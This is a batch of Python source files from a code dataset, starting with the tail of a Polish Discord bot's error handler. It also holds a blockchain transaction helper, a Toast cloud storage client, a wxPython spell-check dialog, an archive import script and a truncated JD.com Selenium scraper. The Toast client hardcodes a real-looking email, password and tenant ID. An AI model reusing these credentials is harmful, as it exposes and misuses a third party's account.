\"\n f\"Pamiętaj o sprawdzeniu nadpisań kanału\")\n return\n elif isinstance(exception, checks.PermissionsError):\n await context.send_to(f\":x: Heh, nie masz wymaganych uprawnień do tej komendy! \"\n f\"Twój poziom to `{exception.current}`, a wymagany `{exception.required}` :(\", delete_after=60)\n await context.message.delete(delay=60)\n return\n # elif isinstance(exception, discord.ext.commands.errors.CheckFailure):\n # return\n elif isinstance(exception, discord.ext.commands.errors.ConversionError):\n if isinstance(exception.original, NotStrongEnough):\n await context.send_to(f\":x: Nawet jeżeli posiadasz wymmagany poziom do tej komendy, nie możesz celować \"\n f\"w kogoś z wyższym/takim samym poziomem jak twój :(\"\n f\"```{exception.original}```\", delete_after=60)\n await context.message.delete(delay=60)\n return\n elif isinstance(exception.original, HierarchyError):\n await context.send_to(f\":x: Masz wymagany poziom do tej komendy, ale nie mogę tago wykonać, \"\n f\"ponieważ twój cel jest wyżej ode mnie. Aby to naprawić, przenieś moją rolę \"\n f\"na samą górę listy ról serwera\"\n f\"```{exception.original}```\")\n return\n elif isinstance(exception, discord.ext.commands.errors.BadArgument):\n await context.send_to(f\":x: Jeden z argumentów jest niepoprawny: \\n\"\n f\"**{exception}**\", delete_after=60)\n await context.message.delete(delay=60)\n return\n elif isinstance(exception, discord.ext.commands.errors.ArgumentParsingError):\n await context.send_to(f\":x: Wystąpił problem podczas analizowania komendy, upewnij się, że wszystkie czudzysłowy są poprawne: \\n\"\n f\"**{exception}**\", delete_after=60)\n await context.message.delete(delay=60)\n return\n elif isinstance(exception, discord.ext.commands.errors.BadUnionArgument):\n await context.send_to(f\":x: Wystąpił problem podczas analizowania arugmentów, upewnij się, że są one poprawnego typu: \\n\"\n f\"**{exception}**\", delete_after=60)\n await context.message.delete(delay=60)\n return\n elif isinstance(exception, discord.ext.commands.errors.CommandOnCooldown):\n if context.message.author.id in [381243923131138058]:\n await context.reinvoke()\n return\n else:\n\n await context.send_to(\"Jesteś na cooldown'ie :(, spróbuj ponownie za {seconds} sekund\".format(\n seconds=round(exception.retry_after, 1)), delete_after=60)\n return\n elif isinstance(exception, discord.ext.commands.errors.TooManyArguments):\n await context.send_to(f\":x: Dałeś mi za dużo argumentów. Być może powinieneś użyć cudzysłowów.\\nUżyj komendy tak : `{context.prefix}{context.command.signature}`\", delete_after=60)\n await context.message.delete(delay=60)\n return\n elif isinstance(exception, discord.ext.commands.NoPrivateMessage):\n await context.send_to('Ta komenda nie może zostać wykonana w wiadomości prywatnej.')\n return\n elif isinstance(exception, discord.ext.commands.errors.CommandInvokeError):\n # await context.author.send(f\"Przepraszam, wystąpił błąd podczas przetwarzania twojej komendy. \"\n # f\"Sprawdź uprawnienia bota i spróbuj ponownie. Aby zgłosić bug, wyślij deweloperowi co następuje: ```py\\n{exception}\\n{''.join(traceback.format_exception(type(exception), exception, exception.__traceback__))}\\n```\", delete_after=3600)\n # print(f'{exception}\\n{''.join(traceback.format_exception(type(exception), exception, exception.__traceback__))}\\n')\n self.logger.error(f'Exeption in command {context.command}')\n try:\n self.logger.error(''.join(traceback.format_exception(type(exception), exception, exception.__traceback__)))\n except Exception as ex:\n self.logger.error(exception)\n try:\n await context.author.send(f\"Przepraszam, wystąpił błąd podczas przetwarzania twojej komendy. \"\n f\"Sprawdź uprawnienia bota i spróbuj ponownie. Aby zgłosić bug, zgłoś na Serwerze Wsparcia co następuje: ```py\\n{exception}\\n{''.join(traceback.format_exception(type(exception), exception, exception.__traceback__))}\\n```\", delete_after=3600)\n except discord.HTTPException:\n await context.author.send(f\"Przepraszam, wystąpił błąd podczas przetwarzania twojej komendy. \"\n f\"Sprawdź uprawnienia bota i spróbuj ponownie. Aby zgłosić bug, zgłoś na Serwerze Wsparcia co następuje: ```py\\n{exception}\\n```\", delete_after=3600)\n finally:\n await context.message.delete(delay=3600)\n return\n elif isinstance(exception, discord.ext.commands.errors.NotOwner):\n return # Jsk uses this\n else:\n self.logger.error('Ignoring exception in command {}:'.format(context.command))\n self.logger.error(\"\".join(traceback.format_exception(type(exception), exception, exception.__traceback__)))\n\n\nasync def get_prefix(bot: BamboBot, message: discord.Message):\n forced_prefixes = ['b!', 'B!', '!b', '!B']\n\n if not message.guild:\n return commands.when_mentioned_or(*forced_prefixes)(bot, message)\n\n prefix_set = await bot.settings.get(message.guild, \"bot_prefix\")\n extras = [prefix_set] + forced_prefixes\n\n return commands.when_mentioned_or(*extras)(bot, message)\n","sub_path":"cogs/helpers/BamboBot.py","file_name":"BamboBot.py","file_ext":"py","file_size_in_byte":9460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"282481308","text":"from customTypes.transaction import TxIn, TxOut, Transaction, blockReward\nfrom crypto import sha256, signTx\nimport json\n\n\ndef createCoinbaseTx(myKey, blockLevel):\n txIn = TxIn(\n txOutId=\"0\",\n txOutIdx=blockLevel\n )\n txIns = [txIn]\n\n txOut = TxOut(\n address=myKey,\n amount=blockReward\n )\n txOuts = [txOut]\n txId = sha256(json.dumps([txIns, txOuts]))\n\n return Transaction(\n txIns=txIns,\n txOuts=txOuts,\n txId=txId,\n signature=signTx(txId)\n )\n","sub_path":"src/ch3/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"395632035","text":"import requests\nfrom django.http import HttpResponse, Http404\n\n\ndef get_token():\n auth_url = 'https://api-compute.cloud.toast.com/identity/v2.0'\n tenant_id = '2426bc68736b4ca186199174c5d570bc'\n username = 'gwngus3922@gmail.com'\n password = 'qpsej0424'\n token_url = auth_url + '/tokens'\n req_header = {'Content-Type': 'application/json'}\n req_body = {\n 'auth': {\n 'tenantId': tenant_id,\n 'passwordCredentials': {\n 'username': username,\n 'password': password\n }\n }\n }\n\n response = requests.post(token_url, headers=req_header, json=req_body)\n return response.json()\n\n\nclass ContainerService:\n account = 'AUTH_2426bc68736b4ca186199174c5d570bc'\n url = ''\n token_id = ''\n\n def __init__(self, url, token_id):\n self.url = url\n self.token_id = token_id\n\n def _get_url(self, container):\n return self.url + self.account + '/' + container\n\n def _get_list(self, req_url):\n req_header = {'X-Auth-Token': self.token_id}\n response = requests.get(req_url, headers=req_header)\n return response.content.decode().split('\\n')\n\n def get_object_list(self, container):\n req_url = self._get_url(container)\n return self._get_list(req_url)\n\n def _get_request_header(self):\n return {'X-Auth-Token': self.token_id}\n\n def create(self, container):\n req_url = self._get_url(container)\n req_header = self._get_request_header()\n return requests.put(req_url, headers=req_header)\n\n def set_read_acl(self, container, is_public):\n req_url = self._get_url(container)\n req_header = self._get_request_header()\n req_header['X-Container-Read'] = '.r:*' if is_public else ''\n return requests.post(req_url, headers=req_header)\n\n\nclass ObjectService:\n account = 'AUTH_2426bc68736b4ca186199174c5d570bc'\n url = ''\n token_id = ''\n dir_path = ''\n\n def __init__(self, url, token_id):\n self.url = url\n self.token_id = token_id\n\n def _get_url(self, container, object_name):\n return self.url + self.account + '/' + container + '/' + object_name\n\n def _get_request_header(self):\n return {'X-Auth-Token': self.token_id}\n\n def upload(self, container, object, file):\n req_url = self._get_url(container, object)\n req_header = self._get_request_header()\n\n requests.put(req_url, headers=req_header, data=file)\n\n def delete(self, container, object):\n req_url = self._get_url(container, object)\n req_header = self._get_request_header()\n requests.delete(req_url, headers=req_header)\n\n def download(self, container, object_name):\n req_url = self._get_url(container, object)\n req_header = self._get_request_header()\n # print(req_url)\n response = requests.get(req_url, headers=req_header)\n\n if response.status_code == 200:\n deliver_response = HttpResponse(content_type='video/mp4')\n # force browser to download file\n deliver_response['Content-Disposition'] = 'attachment; filename=%s' % object_name\n deliver_response.write(response.content)\n else:\n raise Http404\n\n return deliver_response\n\n def get_image_and_video_files_download_url(self, id, vm_no, object_list):\n url_list = []\n idx = 0\n idx2 = 0\n idx3 = 0\n idx4 = 0\n for object in object_list:\n if vm_no in object and \"ProductImages\" in object and \".\" in object:\n tmp_json = {\"ProductImages%d\" % idx: self._get_url(id, object)}\n url_list.append(tmp_json)\n idx += 1\n elif vm_no in object and \"ProductDetailImages\" in object and \".\" in object:\n tmp_json = {\"ProductDetailImages%d\" % idx2: self._get_url(id, object)}\n url_list.append(tmp_json)\n idx2 += 1\n elif vm_no in object and \"PromotionVideos\" in object and \".\" in object:\n tmp_json = {\"PromotionVideos%d\" % idx3: self._get_url(id, object)}\n url_list.append(tmp_json)\n idx3 += 1\n elif vm_no in object and \"VideosThumbnail\" in object and \".\" in object:\n tmp_json = {\"VideosThumbnail%d\" % idx3: self._get_url(id, object)}\n url_list.append(tmp_json)\n idx4 += 1\n\n return url_list","sub_path":"app/toast.py","file_name":"toast.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"280207715","text":"from zoundry.appframework.ui.widgets.dialog import ZBaseDialog\r\nfrom zoundry.base.util.text.textutil import getNoneString\r\nfrom zoundry.blogapp.messages import _extstr\r\nfrom zoundry.appframework.ui.dialogs.mixins import ZPersistentDialogMixin\r\nfrom zoundry.blogapp.constants import IZBlogAppUserPrefsKeys\r\nimport wx\r\n\r\n\r\n# ---------------------------------------------------------------------------------------\r\n# The standard modal dialog used for spell check\r\n# ---------------------------------------------------------------------------------------\r\nclass ZSpellCheckDialog(ZBaseDialog, ZPersistentDialogMixin):\r\n\r\n def __init__(self, parent, spellCheckModel):\r\n self.spellCheckModel = spellCheckModel\r\n ZBaseDialog.__init__(self, parent,wx.ID_ANY, _extstr(u\"spellcheckdialog.DialogTitle\"), size = wx.Size(350, 340), style =wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, name = u\"ZSpellCheckDialog\") #$NON-NLS-1$ #$NON-NLS-2$\r\n ZPersistentDialogMixin.__init__(self, IZBlogAppUserPrefsKeys.SPELLCHECK_DIALOG, False, True)\r\n # end __init__()\r\n\r\n def _getButtonTypes(self):\r\n return ZBaseDialog.CLOSE_BUTTON\r\n # end _getButtonTypes()\r\n\r\n def _createContentWidgets(self):\r\n\r\n self.misspellLabel = wx.StaticText(self, -1,_extstr(u\"spellcheckdialog.MisspellWord\") + u\":\", size=wx.Size(-1,20)) #$NON-NLS-1$ #$NON-NLS-2$\r\n self.replaceLabel = wx.StaticText(self, -1,_extstr(u\"spellcheckdialog.ReplaceWith\") + u\":\", size=wx.Size(-1,20)) #$NON-NLS-1$ #$NON-NLS-2$\r\n self.suggestLabel = wx.StaticText(self, -1,_extstr(u\"spellcheckdialog.Suggestions\") + u\":\", size=wx.Size(-1,20)) #$NON-NLS-1$ #$NON-NLS-2$\r\n\r\n self.ignoreBtn = wx.Button(self, -1, _extstr(u\"spellcheckdialog.Ignore\")) #$NON-NLS-1$\r\n self.ignoreAllBtn = wx.Button(self, -1, _extstr(u\"spellcheckdialog.IgnoreAll\")) #$NON-NLS-1$\r\n self.addBtn = wx.Button(self, -1, _extstr(u\"spellcheckdialog.Add\")) #$NON-NLS-1$\r\n self.replaceBtn = wx.Button(self, -1, _extstr(u\"spellcheckdialog.Replace\")) #$NON-NLS-1$\r\n self.replaceAllBtn = wx.Button(self, -1, _extstr(u\"spellcheckdialog.ReplaceAll\")) #$NON-NLS-1$\r\n\r\n self.replacewordCntrl = wx.TextCtrl(id=wx.NewId(), parent=self, size=wx.Size(-1,20), style=wx.TE_PROCESS_ENTER)\r\n self.suggestionsCntrl = wx.ListBox(id=wx.NewId(), parent=self, style=wx.LB_SINGLE|wx.LB_HSCROLL|wx.LB_NEEDED_SB)\r\n\r\n self.mispellwordCntrl = wx.TextCtrl(id=wx.NewId(), parent=self, style=wx.TE_MULTILINE|wx.TE_RICH2)\r\n\r\n # end _createContentWidgets()\r\n\r\n def _populateContentWidgets(self):\r\n self._setSpellCheckResult( self.spellCheckModel.getSpellCheckResult() )\r\n # end _populateContentWidgets()\r\n\r\n def _layoutContentWidgets(self):\r\n # empty label as a filler\r\n filler1 = wx.StaticText(self,-1,label=u' ',size=wx.Size(-1,20)) #$NON-NLS-1$\r\n filler3 = wx.StaticText(self,-1,label=u' ',size=wx.Size(-1,20)) #$NON-NLS-1$\r\n filler4 = wx.StaticText(self,-1,label=u' ',size=wx.Size(-1,20)) #$NON-NLS-1$\r\n filler5 = wx.StaticText(self,-1,label=u' ',size=wx.Size(-1,20)) #$NON-NLS-1$\r\n\r\n # layout ignore, ignoreall, add vertically in a panel.\r\n buttonSizer1 = wx.BoxSizer(wx.VERTICAL)\r\n buttonSizer1.Add(self.ignoreBtn, 0, wx.ALIGN_LEFT |wx.ALL, 2)\r\n buttonSizer1.Add(self.ignoreAllBtn, 0, wx.ALIGN_LEFT |wx.ALL, 2)\r\n buttonSizer1.Add(self.addBtn, 0, wx.ALIGN_LEFT |wx.ALL, 2)\r\n\r\n # layout replace and replaceall vertically in a panel.\r\n buttonSizer2 = wx.BoxSizer(wx.VERTICAL)\r\n buttonSizer2.Add(self.replaceBtn, 0, wx.ALIGN_LEFT |wx.ALL, 2)\r\n buttonSizer2.Add(self.replaceAllBtn, 0, wx.ALIGN_LEFT |wx.ALL, 2)\r\n\r\n # layout all in a 2col x 6row flex grid.\r\n sizer = wx.FlexGridSizer(6,2,4,4)\r\n sizer.AddGrowableCol(0)\r\n # margin:\r\n m = 8\r\n # row 1: label\r\n sizer.AddMany([\r\n (self.misspellLabel, 1, wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.LEFT | wx.TOP, m),\r\n (filler1, 0,wx.ALIGN_LEFT| wx.RIGHT, m)\r\n ])\r\n\r\n # row 2: misspell word control and button panel 1\r\n sizer.AddMany([\r\n (self.mispellwordCntrl, 1, wx.ALIGN_LEFT | wx.ALIGN_TOP | wx.EXPAND| wx.LEFT, m),\r\n (buttonSizer1, 0,wx.ALIGN_LEFT | wx.EXPAND| wx.RIGHT, m)\r\n ])\r\n\r\n # row 3: label\r\n sizer.AddMany([\r\n (self.replaceLabel, 1, wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL| wx.EXPAND| wx.LEFT | wx.TOP, m),\r\n (filler3, 0,wx.ALIGN_LEFT| wx.RIGHT, m)\r\n ])\r\n\r\n # row 4: replace text control\r\n sizer.AddMany([\r\n (self.replacewordCntrl, 1, wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL| wx.EXPAND| wx.LEFT, m),\r\n (filler4, 0,wx.ALIGN_LEFT| wx.RIGHT, m)\r\n ])\r\n\r\n # row 5: label\r\n sizer.AddMany([\r\n (self.suggestLabel, 1, wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL| wx.EXPAND| wx.LEFT | wx.TOP, m),\r\n (filler5, 0,wx.ALIGN_LEFT | wx.RIGHT, m)\r\n ])\r\n\r\n # row 6: suggestions control and button panel 2\r\n sizer.AddMany([\r\n (self.suggestionsCntrl, 1, wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL | wx.EXPAND| wx.LEFT, m),\r\n (buttonSizer2, 0,wx.ALIGN_LEFT | wx.EXPAND| wx.RIGHT, m)\r\n ])\r\n\r\n return sizer\r\n # end _layoutContentWidgets()\r\n\r\n def _bindWidgetEvents(self):\r\n self.Bind(wx.EVT_BUTTON, self.onIgnore, self.ignoreBtn)\r\n self.Bind(wx.EVT_BUTTON, self.onIgnoreAll, self.ignoreAllBtn)\r\n self.Bind(wx.EVT_BUTTON, self.onAddWord, self.addBtn)\r\n self.Bind(wx.EVT_BUTTON, self.onReplace, self.replaceBtn)\r\n self.Bind(wx.EVT_BUTTON, self.onReplaceAll, self.replaceAllBtn)\r\n\r\n self.Bind(wx.EVT_TEXT_ENTER, self.onReplaceWordEnterPressed, self.replacewordCntrl)\r\n self.Bind(wx.EVT_CHAR, self.onReplaceWordKeyPressed, self.replacewordCntrl)\r\n self.Bind(wx.EVT_LISTBOX, self.onSuggestionListSelection, self.suggestionsCntrl)\r\n self.Bind(wx.EVT_LISTBOX_DCLICK, self.onSuggestionListDoubleClick, self.suggestionsCntrl)\r\n # end _bindWidgetEvents()\r\n\r\n def _doCheckNextWord(self):\r\n spellCheckResult = self.spellCheckModel.checkNextWord()\r\n self._setSpellCheckResult(spellCheckResult)\r\n # end _doNextCheck()\r\n\r\n def _setSpellCheckResult(self, spellCheckResult):\r\n if spellCheckResult and spellCheckResult.isFinished():\r\n self.Close()\r\n return\r\n self._updateUI(spellCheckResult)\r\n # end _setSpellCheckResult()\r\n\r\n def _updateUI(self, spellCheckResult):\r\n # update UI given IZSpellCheckResult (which could be None)\r\n self._updateMisspelledWordUI(spellCheckResult)\r\n self._updateSuggestionListUI(spellCheckResult)\r\n self._updateReplaceButtonsState()\r\n # end _updateUI()\r\n\r\n def _updateMisspelledWordUI(self, spellCheckResult):\r\n self.mispellwordCntrl.Clear()\r\n if not spellCheckResult:\r\n return\r\n (sentence, startPos, endPos)= self.spellCheckModel.getMisspelledWordData(spellCheckResult)\r\n self.mispellwordCntrl.SetValue(sentence)\r\n if startPos >= 0 and endPos > 0 and endPos > startPos:\r\n self.mispellwordCntrl.SetStyle(startPos, endPos, wx.TextAttr(u\"RED\", u\"YELLOW\")) #$NON-NLS-1$ #$NON-NLS-2$\r\n # _updateMisspelledWordUI()\r\n\r\n def _updateSuggestionListUI(self, spellCheckResult):\r\n self.replacewordCntrl.Clear()\r\n self.suggestionsCntrl.Clear()\r\n if not spellCheckResult:\r\n return\r\n\r\n sList = self.spellCheckModel.getSuggestions(spellCheckResult)\r\n self.suggestionsCntrl.InsertItems(sList,0)\r\n if len(sList) > 0:\r\n self.replacewordCntrl.SetValue(sList[0])\r\n self.replacewordCntrl.SetSelection(-1,-1)\r\n self.suggestionsCntrl.SetSelection(0,True)\r\n # end _updateSuggestionListUI()\r\n\r\n def _updateReplaceButtonsState(self):\r\n enable = self.suggestionsCntrl.GetCount() > 0 or getNoneString( self.replacewordCntrl.GetValue()) is not None\r\n self.replaceBtn.Enable(enable)\r\n self.replaceAllBtn.Enable(enable)\r\n self.suggestionsCntrl.Enable(self.suggestionsCntrl.GetCount() > 0)\r\n # end _updateReplaceButtonsState()\r\n\r\n def _doReplace(self, replaceAll):\r\n word = getNoneString( self.replacewordCntrl.GetValue())\r\n if word:\r\n self.spellCheckModel.replace(word, replaceAll)\r\n self._doCheckNextWord()\r\n # end _doReplace()\r\n\r\n def _doIgnore(self, ignoreAll):\r\n self.spellCheckModel.ignore(ignoreAll)\r\n self._doCheckNextWord()\r\n # end _doReplace()\r\n\r\n def onIgnore(self, event): #@UnusedVariable\r\n self._doIgnore(False)\r\n # end onIgnore\r\n\r\n def onIgnoreAll(self, event): #@UnusedVariable\r\n self._doIgnore(True)\r\n # end onIgnoreAll\r\n\r\n def onAddWord(self, event): #@UnusedVariable\r\n self.spellCheckModel.addWord()\r\n self._doCheckNextWord()\r\n # end onAddWord\r\n\r\n def onReplace(self, event): #@UnusedVariable\r\n self._doReplace(False)\r\n # end onReplace\r\n\r\n def onReplaceAll(self, event): #@UnusedVariable\r\n self._doReplace(True)\r\n # end onReplaceAll\r\n\r\n def onReplaceWordEnterPressed(self, event):\r\n self.onReplace(event)\r\n # end onReplaceWordEnterPressed\r\n\r\n def onReplaceWordKeyPressed(self, event): #@UnusedVariable\r\n self._updateReplaceButtonsState()\r\n # end onReplaceWordKeyPressed\r\n\r\n def onSuggestionListSelection(self, event): #@UnusedVariable\r\n if self.suggestionsCntrl.GetStringSelection():\r\n self.replacewordCntrl.SetValue(self.suggestionsCntrl.GetStringSelection())\r\n # end onSuggestionListSelection\r\n\r\n def onSuggestionListDoubleClick(self, event): #@UnusedVariable\r\n if self.suggestionsCntrl.GetStringSelection():\r\n self.replacewordCntrl.SetValue(self.suggestionsCntrl.GetStringSelection())\r\n self._doReplace(False)\r\n # end onSuggestionListDoubleClick\r\n\r\n#end ZSpellCheckDialog\r\n\r\n\r\n\r\n","sub_path":"src/python/zoundry/blogapp/ui/dialogs/spellcheckdialog.py","file_name":"spellcheckdialog.py","file_ext":"py","file_size_in_byte":10103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"59973245","text":"# -*- coding: utf-8 -*-\n\"\"\"\n著作權所有 (C) 民國103年 意傳文化科技\n開發者:薛丞宏\n網址:http://意傳.台灣\n語料來源:請看各資料庫內說明\n\n本程式乃自由軟體,您必須遵照SocialCalc設計的通用公共授權(Common Public Attribution License, CPAL)來修改和重新發佈這一程式,詳情請參閱條文。授權大略如下,若有歧異,以授權原文為主:\n\t1.得使用、修改、複製並發佈此程式碼,且必須以通用公共授權發行;\n\t2.任何以程式碼衍生的執行檔或網路服務,必須公開該程式碼;\n\t3.將此程式的原始碼當函式庫引用入商業軟體,且不需公開非關此函式庫的任何程式碼\n\n此開放原始碼、共享軟體或說明文件之使用或散佈不負擔保責任,並拒絕負擔因使用上述軟體或說明文件所致任何及一切賠償責任或損害。\n\n臺灣言語工具緣起於本土文化推廣與傳承,非常歡迎各界用於商業軟體,但希望在使用之餘,能夠提供建議、錯誤回報或修補,回饋給這塊土地。\n\n感謝您的使用與推廣~~勞力!承蒙!\n\"\"\"\nfrom 臺灣言語工具.資料庫.資料庫連線 import 資料庫連線\nimport xlrd\n\nclass 數位典藏文本段落轉逝:\n\t到逝=True\n\t揣數位典藏文本段資料庫 = 資料庫連線.prepare('SELECT \"id\",\"檔案名\",\"漢羅\",\"全羅\",\"漢羅逝\",\"全羅逝\" '+\n\t\t'FROM \"台語文數位典藏\".\"改過段落資料\" ' +\n\t\t'WHERE LOWER(\"檔案名\") LIKE LOWER($1)')\n# \t揣數位典藏文本段資料庫 = 資料庫連線.prepare('SELECT \"id\",\"檔案名\" '+\n# \t\t'FROM \"台語文數位典藏\".\"改過段落資料\" ' +\n# \t\t'WHERE LOWER(\"檔案名\") LIKE LOWER($1)')\n\t插入台語數位典藏文本資料庫 = 資料庫連線.prepare('INSERT INTO \"台語文數位典藏\".\"��始逝資料\" ' +\n\t\t'(\"流水號\",\"時代\",\"年\",\"類\",\"類二\",\"漢羅標\",\"全羅標\",\"漢羅名\",\"全羅名\",\"檔案名\",\"漢羅文\",\"全羅文\",\"漢羅逝\",\"全羅逝\") '+\n\t\t'VALUES ($1,$2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14)')\n\t插入修改數位典藏文本資料庫 = 資料庫連線.prepare('INSERT INTO \"台語文數位典藏\".\"改過逝資料\" ' +\n\t\t'(\"流水號\",\"時代\",\"年\",\"類\",\"類二\",\"漢羅標\",\"全羅標\",\"漢羅名\",\"全羅名\",\"檔案名\",\"漢羅文\",\"全羅文\",\"漢羅逝\",\"全羅逝\") '+\n\t\t'VALUES ($1,$2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14)')\n\t目錄檔='/dev/shm/pbk.xls'\n\tdef __init__(self):\n\t\t表格檔=xlrd.open_workbook(self.目錄檔)\n\t\tfor 表格名 in 表格檔.sheet_names():\n\t\t\t表格=表格檔.sheet_by_name(表格名)\n\t\t\tprint(表格.row_values(0))\n\t\t\t段落流水號={}\n\t\t\t狀況={}\n\t\t\tfor 第幾逝 in range(1,表格.nrows):\n\t\t\t\t資料=表格.row_values(第幾逝)\n\t\t\t\tif 資料[-1] == 'XXX':\n\t\t\t\t\tcontinue\n\t\t\t\t目錄流水號,全羅標,漢羅標,年,全羅名,漢羅名,時代,類,類二=資料[:9]\n\t\t\t\t目錄流水號=int(目錄流水號)\n\t\t\t\tif isinstance(年, float):\n\t\t\t\t\t年=int(年)\n\t\t\t\tif isinstance(年, int):\n\t\t\t\t\t年=str(年)\n\t\t\t\t\n\t\t\t\t#{0: 649, 1: 1505, 2: 8, 4: 1}\n\t\t\t\t#L{1: 2149, 2: 11, 3: 2, 5: 1}//段落流水號1:2139 2:16\n\t\t\t\t可能檔名='%{0}%{1}%{2}%{3}%{4}%{5}%'.format(時代,年,類,年,全羅名,全羅標)\n\t\t\t\t\n\t\t\t\t#{0: 11, 1: 2138, 2: 12, 3: 1, 4: 1}\n\t\t\t\t#L{1: 2147, 2: 13, 3: 2, 5: 1}\n# \t\t\t\t可能檔名='%{0}%{1}%{2}%'.format(年,全羅名,全羅標)\n\n\t\t\t\t#L{1: 2156, 2: 6, 3: 1}\n\t\t\t\t可能檔名='%{0}%{1}%{2}%{3}%{4}%{5}.%'.format(時代,年,類,年,全羅名,全羅標)\n\t\t\t\t#L{1: 2163}\n\t\t\t\t可能檔名='%{0}%{1}%{2}%{3}%{4}.{5}.%'.format(時代,年,類,年,全羅名,全羅標)\n\t\t\t\t#{0: 11, 1: 2152}\n# \t\t\t\t可能檔名='%{0}%{1}%%{3}%{4}.{5}.%'.format(時代,年,類,年,全羅名,全羅標)\n\n\t\t\t\t段資料=list(self.揣數位典藏文本段資料庫(可能檔名))\n\t\t\t\tfor 段 in 段資料:\n\t\t\t\t\t段流水號=段[0]\n\t\t\t\t\tif 段流水號 not in 段落流水號:\n\t\t\t\t\t\t段落流水號[段流水號]=0\n\t\t\t\t\t段落流水號[段流水號]+=1\n\t\t\t\t\n\t\t\t\t新狀況=len(段資料)\n\t\t\t\tif 新狀況 not in 狀況:\n\t\t\t\t\t狀況[新狀況]=0\n\t\t\t\t狀況[新狀況]+=1\n\t\t\t\tif 新狀況!=1:\n\t\t\t\t\tprint(目錄流水號,可能檔名)\n\t\t\t\t\tprint(新狀況,段資料)\n\t\t\t\t\t\n\t\t\t\tif self.到逝:\n\t\t\t\t\t段流水號,檔案名,漢羅文,全羅文,漢羅逝,全羅逝=段資料[0]\n# \t\t\t\t\t流水號\",\"時代\",\"年\",\"類\",\"類二\",\"漢羅標\",\"全羅標\",\"漢羅名\",\"全羅名\",\"檔案名\",\"漢羅文\",\"全羅文\",\"漢羅逝\",\"全羅逝\n\t\t\t\t\tif '
' in 漢羅文 or '
' in 全羅文 or '
' in 漢羅文 or '
' in 全羅文:\n\t\t\t\t\t\t漢羅文=漢羅文.replace('\\n','\\n\\n').replace('
','\\n').replace('
','\\n')\n\t\t\t\t\t\t全羅文=全羅文.replace('\\n','\\n\\n').replace('
','\\n').replace('
','\\n')\n\t\t\t\t\t漢羅文=漢羅文.strip().split('\\n')\n\t\t\t\t\t全羅文=全羅文.strip().split('\\n')\n\t\t\t\t\tfor 所在 in range(len(漢羅文)):\n\t\t\t\t\t\t漢羅文[所在]=漢羅文[所在].strip()\n\t\t\t\t\tfor 所在 in range(len(全羅文)):\n\t\t\t\t\t\t全羅文[所在]=全羅文[所在].strip()\n\t\t\t\t\t漢羅逝,全羅逝=len(漢羅文),len(全羅文)\n\t\t\t\t\t漢羅文='\\n'.join(漢羅文)\n\t\t\t\t\t全羅文='\\n'.join(全羅文)\n# \t\t\t\t\t目錄流水號,全羅標,漢羅標,年,全羅名,漢羅名,時代,類,類二=資料[:9]\n# \t\t\t\t\tprint(目錄流水號,時代,年,類,類二,漢羅標,全羅標,漢羅名,全羅名,檔案名,漢羅文,全羅文,漢羅逝,全羅逝)\n# \t\t\t\t\tprint(目錄流水號,時代,年,類,類二,漢羅標,全羅標,漢羅名,全羅名,檔案名,漢羅逝,全羅逝)\n\t\t\t\t\tself.插入台語數位典藏文本資料庫(目錄流水號,時代,年,類,類二,漢羅標,全羅標,漢羅名,全羅名,檔案名,漢羅文,全羅文,漢羅逝,全羅逝)\n\t\t\t\t\tself.插入修改數位典藏文本資料庫(目錄流水號,時代,年,類,類二,漢羅標,全羅標,漢羅名,全羅名,檔案名,漢羅文,全羅文,漢羅逝,全羅逝) \n\t\t\tprint(狀況)\n\t\t\tprint(段落流水號)\n\t\t\tprint(len(段落流水號))\n\t\t\tfor 號 in range(2,2171):\n\t\t\t\tif 號 not in 段落流水號:\n\t\t\t\t\tprint('無:',號)\n\t\t\tfor 號 in range(2,2171):\n\t\t\t\tif 號 not in 段落流水號:\n\t\t\t\t\tpass\n\t\t\t\telif 段落流水號[號]>1:\n\t\t\t\t\tprint('二个以上:',號)\n\nif __name__ == '__main__':\n\t數位典藏文本段落轉逝()\n","sub_path":"舊臺灣言語工具/資料佮語料匯入整合/數位典藏/數位典藏文本段落轉逝.py","file_name":"數位典藏文本段落轉逝.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"530238084","text":"# -*- coding:utf-8 -*-\nimport time, random, logging, os\nfrom selenium import webdriver\nfrom fake_useragent import UserAgent\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n# Begin\nkeyword = input(\"请输入关键词文件名!\")\nprint('\\n关键词为:{}'.format(keyword))\n# 随机头部,不显示测试,禁止gpu\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('disable-infobars')\nchrome_options.add_argument('disable-gpu')\nchrome_options.add_argument('useragent=\"{}\"'.format(UserAgent().random))\n# chrome_options.add_argument('proxy-server=http://121.231.155.108:6666')\ndriver = webdriver.Chrome(chrome_options=chrome_options)\nwait = WebDriverWait(driver, 15)\ndriver.get(url='https://www.jd.com/')\ntime_start = time.time()\ntime.sleep(random.randint(2, 3))\nlink_file = open(\"京东sort{}.txt\".format(keyword), \"w\")\n\ndef isExist(rule):\n try:\n driver.find_element_by_xpath(rule)\n return True\n except:\n return False\n\ndef loaditem():\n # 翻三次使全部加载\n driver.execute_script('window.scrollTo(0, document.body.scrollHeight/2)')\n time.sleep(random.randint(1, 3))\n driver.execute_script('window.scrollTo(0, document.body.scrollHeight*7/10)')\n time.sleep(random.randint(1, 3))\n target = 